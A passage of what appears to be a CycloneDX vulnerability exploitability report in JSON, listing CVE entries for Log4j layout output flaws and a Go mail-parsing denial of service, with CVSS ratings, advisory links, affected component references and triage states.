          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:maven/io.netty/netty-codec-http2@4.1.130.Final"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#83af83c1-47e0-46ce-89f6-ffcadae11cbf"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#83af83c1-47e0-46ce-89f6-ffcadae11cbf"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#83af83c1-47e0-46ce-89f6-ffcadae11cbf"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#83af83c1-47e0-46ce-89f6-ffcadae11cbf"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#581c68e4-8e15-46ba-8544-7ef71435d4ea"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#581c68e4-8e15-46ba-8544-7ef71435d4ea"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#581c68e4-8e15-46ba-8544-7ef71435d4ea"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#581c68e4-8e15-46ba-8544-7ef71435d4ea"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#0e956f60-e2c6-4ad1-9f30-f8c861929cef"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#0e956f60-e2c6-4ad1-9f30-f8c861929cef"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#0e956f60-e2c6-4ad1-9f30-f8c861929cef"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#0e956f60-e2c6-4ad1-9f30-f8c861929cef"
        }
      ],
      "analysis": {
        "state": "in_triage",
        "justification": "",
        "response": [],
        "detail": "This CVE is under investigation by Confluent."
      }
    },
    {
      "id": "CVE-2026-34479",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
        }
      ],
      "cwes": [
        116
      ],
      "description": "The Log4j1XmlLayout from the Apache Log4j 1-to-Log4j 2 bridge fails to escape characters forbidden by the XML 1.0 standard, producing malformed XML output. Conforming XML parsers are required to reject documents containing such characters with a fatal error, which may cause downstream log processing systems to drop or fail to index affected records.\n\nTwo groups of users are affected:\n\n  *  Those using Log4j1XmlLayout directly in a Log4j Core 2 configuration file.\n  *  Those using the Log4j 1 configuration compatibility layer with org.apache.log4j.xml.XMLLayout specified as the layout class.\n\n\nUsers are advised to upgrade to Apache Log4j 1-to-Log4j 2 bridge version 2.25.4, which corrects this issue.\n\nNote: The Apache Log4j 1-to-Log4j 2 bridge is deprecated and will not be present in Log4j 3. Users are encouraged to consult the  Log4j 1 to Log4j 2 migration guide https://logging.apache.org/log4j/2.x/migrate-from-log4j1.html , and specifically the section on eliminating reliance on the bridge.",
      "recommendation": "Upgrade org.apache.logging.log4j:log4j-1.2-api to version 2.25.4",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-34479"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/04/10/8"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-34479"
        },
        {
          "url": "https://github.com/apache/logging-log4j2"
        },
        {
          "url": "https://github.com/apache/logging-log4j2/pull/4078"
        },
        {
          "url": "https://lists.apache.org/thread/gd0hp6mj17rn3kj279vgy4p7kd4zz5on"
        },
        {
          "url": "https://logging.apache.org/cyclonedx/vdr.xml"
        },
        {
          "url": "https://logging.apache.org/log4j/2.x/migrate-from-log4j1.html"
        },
        {
          "url": "https://logging.apache.org/security.html#CVE-2026-34479"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34479"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-34479"
        }
      ],
      "published": "2026-04-10T16:16:31+00:00",
      "updated": "2026-05-06T18:21:34+00:00",
      "affects": [
        {
          "ref": "pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3",
          "versions": [
            {
              "version": "2.25.3",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3",
          "versions": [
            {
              "version": "2.25.3",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3",
          "versions": [
            {
              "version": "2.25.3",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3",
          "versions": [
            {
              "version": "2.25.3",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#55b43b4a-82cb-4a59-8429-8465f67b3dd6"
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#55b43b4a-82cb-4a59-8429-8465f67b3dd6"
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#55b43b4a-82cb-4a59-8429-8465f67b3dd6"
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#55b43b4a-82cb-4a59-8429-8465f67b3dd6"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#0d21e41a-f810-4500-89fc-0b81ccf1989d"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#0d21e41a-f810-4500-89fc-0b81ccf1989d"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#0d21e41a-f810-4500-89fc-0b81ccf1989d"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#0d21e41a-f810-4500-89fc-0b81ccf1989d"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3"
        },
        {
          "ref": "urn:cdx:93a4fa62-d367-4223-8767-f8e30d5965ba/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3"
        },
        {
          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3"
        },
        {
          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3"
        },
        {
          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3"
        },
        {
          "ref": "urn:cdx:61f37057-a39d-4979-b92c-7080941e330f/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3"
        },
        {
          "ref": "urn:cdx:17b63bf1-a7f6-476f-9af1-58e45e17a6a7/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3"
        },
        {
          "ref": "urn:cdx:17b63bf1-a7f6-476f-9af1-58e45e17a6a7/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3"
        },
        {
          "ref": "urn:cdx:17b63bf1-a7f6-476f-9af1-58e45e17a6a7/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3"
        },
        {
          "ref": "urn:cdx:17b63bf1-a7f6-476f-9af1-58e45e17a6a7/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3"
        },
        {
          "ref": "urn:cdx:9cfedadb-581e-44dd-adca-95d605fbe99a/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3"
        },
        {
          "ref": "urn:cdx:9cfedadb-581e-44dd-adca-95d605fbe99a/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3"
        },
        {
          "ref": "urn:cdx:9cfedadb-581e-44dd-adca-95d605fbe99a/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3"
        },
        {
          "ref": "urn:cdx:9cfedadb-581e-44dd-adca-95d605fbe99a/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3"
        },
        {
          "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#96124910-c15e-4db7-ab1b-5ad921e841f7"
        },
        {
          "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#96124910-c15e-4db7-ab1b-5ad921e841f7"
        },
        {
          "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#96124910-c15e-4db7-ab1b-5ad921e841f7"
        },
        {
          "ref": "urn:cdx:9f54a881-960e-4b34-8bf1-8acdf345d78b/1#96124910-c15e-4db7-ab1b-5ad921e841f7"
        },
        {
          "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#1457d357-f148-4ec4-87b9-f7914813399a"
        },
        {
          "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#1457d357-f148-4ec4-87b9-f7914813399a"
        },
        {
          "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#1457d357-f148-4ec4-87b9-f7914813399a"
        },
        {
          "ref": "urn:cdx:ba8e630c-da17-4b7e-8f33-d3622b38b35d/1#1457d357-f148-4ec4-87b9-f7914813399a"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3"
        },
        {
          "ref": "urn:cdx:f1046be3-21d4-4602-a45e-8d7bbd5ede4c/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3"
        },
        {
          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3"
        },
        {
          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3"
        },
        {
          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3"
        },
        {
          "ref": "urn:cdx:85012461-0171-46d4-b75a-e71dcc2117f5/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3"
        },
        {
          "ref": "urn:cdx:d55d166c-3f45-4aff-8bc1-1aa77d03af92/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3"
        },
        {
          "ref": "urn:cdx:d55d166c-3f45-4aff-8bc1-1aa77d03af92/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3"
        },
        {
          "ref": "urn:cdx:d55d166c-3f45-4aff-8bc1-1aa77d03af92/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3"
        },
        {
          "ref": "urn:cdx:d55d166c-3f45-4aff-8bc1-1aa77d03af92/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3"
        },
        {
          "ref": "urn:cdx:7ea40305-a30e-4dd7-9e8b-6a3782e6f49f/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3"
        },
        {
          "ref": "urn:cdx:7ea40305-a30e-4dd7-9e8b-6a3782e6f49f/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3"
        },
        {
          "ref": "urn:cdx:7ea40305-a30e-4dd7-9e8b-6a3782e6f49f/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3"
        },
        {
          "ref": "urn:cdx:7ea40305-a30e-4dd7-9e8b-6a3782e6f49f/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3"
        },
        {
          "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3"
        },
        {
          "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3"
        },
        {
          "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3"
        },
        {
          "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3"
        },
        {
          "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3"
        },
        {
          "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3"
        },
        {
          "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3"
        },
        {
          "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3"
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3"
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3"
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3"
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#1e4c7647-5a63-40bb-85e9-e80ed85613d0"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#1e4c7647-5a63-40bb-85e9-e80ed85613d0"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#1e4c7647-5a63-40bb-85e9-e80ed85613d0"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#1e4c7647-5a63-40bb-85e9-e80ed85613d0"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#7f58578f-0943-45ec-91f5-81f2d38278b0"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#7f58578f-0943-45ec-91f5-81f2d38278b0"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#7f58578f-0943-45ec-91f5-81f2d38278b0"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#7f58578f-0943-45ec-91f5-81f2d38278b0"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:maven/org.apache.logging.log4j/log4j-1.2-api@2.25.3"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#42449972-57e6-4a8c-b0e9-185279115fbf"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#42449972-57e6-4a8c-b0e9-185279115fbf"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#42449972-57e6-4a8c-b0e9-185279115fbf"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#42449972-57e6-4a8c-b0e9-185279115fbf"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#4aae5298-979f-4cfa-8315-75bdce2e9de0"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#4aae5298-979f-4cfa-8315-75bdce2e9de0"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#4aae5298-979f-4cfa-8315-75bdce2e9de0"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#4aae5298-979f-4cfa-8315-75bdce2e9de0"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-34481",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
        }
      ],
      "cwes": [
        116
      ],
      "description": "Apache Log4j's JsonTemplateLayout (https://logging.apache.org/log4j/2.x/manual/json-template-layout.html), in versions up to and including 2.25.3, produces invalid JSON output when log events contain non-finite floating-point values (NaN, Infinity, or -Infinity), which are prohibited by RFC 8259. This may cause downstream log processing systems to reject or fail to index affected records.\n\nAn attacker can exploit this issue only if both of the following conditions are met:\n\n  *  The application uses JsonTemplateLayout.\n  *  The application logs a MapMessage containing an attacker-controlled floating-point value.\n\n\nUsers are advised to upgrade to Apache Log4j JSON Template Layout 2.25.4, which corrects this issue.",
      "recommendation": "Upgrade org.apache.logging.log4j:log4j-layout-template-json to version 2.25.4",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-34481"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/04/10/10"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-34481"
        },
        {
          "url": "https://github.com/apache/logging-log4j2"
        },
        {
          "url": "https://github.com/apache/logging-log4j2/pull/4080"
        },
        {
          "url": "https://lists.apache.org/thread/n34zdv00gbkdbzt2rx9rf5mqz6lhopcv"
        },
        {
          "url": "https://logging.apache.org/cyclonedx/vdr.xml"
        },
        {
          "url": "https://logging.apache.org/log4j/2.x/manual/json-template-layout.html"
        },
        {
          "url": "https://logging.apache.org/security.html#CVE-2026-34481"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34481"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-34481"
        }
      ],
      "published": "2026-04-10T16:16:31+00:00",
      "updated": "2026-04-24T18:24:14+00:00",
      "affects": [
        {
          "ref": "pkg:maven/org.apache.logging.log4j/log4j-layout-template-json@2.25.3",
          "versions": [
            {
              "version": "2.25.3",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:5ddfd767-95ac-4f7a-9a8e-63a6d71d5c04/1#pkg:maven/org.apache.logging.log4j/log4j-layout-template-json@2.25.3"
        },
        {
          "ref": "urn:cdx:be506ec7-64a4-45ee-ad51-ad54726720fb/1#pkg:maven/org.apache.logging.log4j/log4j-layout-template-json@2.25.3"
        },
        {
          "ref": "urn:cdx:c6a63ec3-f4d4-4b15-8ded-4a99e47a4489/1#pkg:maven/org.apache.logging.log4j/log4j-layout-template-json@2.25.3"
        },
        {
          "ref": "urn:cdx:c28aa302-c487-4fc8-a148-6be94565cf4f/1#pkg:maven/org.apache.logging.log4j/log4j-layout-template-json@2.25.3"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:maven/org.apache.logging.log4j/log4j-layout-template-json@2.25.3"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:maven/org.apache.logging.log4j/log4j-layout-template-json@2.25.3"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:maven/org.apache.logging.log4j/log4j-layout-template-json@2.25.3"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:maven/org.apache.logging.log4j/log4j-layout-template-json@2.25.3"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:maven/org.apache.logging.log4j/log4j-layout-template-json@2.25.3"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-39820",
      "source": {
        "name": "govulndb",
        "url": "https://pkg.go.dev/vuln/"
      },
      "ratings": [
        {
          "source": {
            "name": "bitnami"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "description": "Well-crafted inputs reaching ParseAddress, ParseAddressList, and ParseDate were able to trigger excessive CPU consumption and memory allocation.",
      "recommendation": "Upgrade stdlib to version 1.25.10, 1.26.3",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-39820"
        },
        {
          "url": "https://go.dev/cl/759940"
        },
        {
          "url": "https://go.dev/issue/78566"
        },
        {
          "url": "https://groups.google.com/g/golang-announce/c/qcCIEXso47M"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39820"
        },
        {
          "url": "https://pkg.go.dev/vuln/GO-2026-4986"
        }
      ],
      "published": "2026-05-07T20:16:43+00:00",
      "updated": "2026-05-08T15:16:37+00:00",
      "affects": [
        {
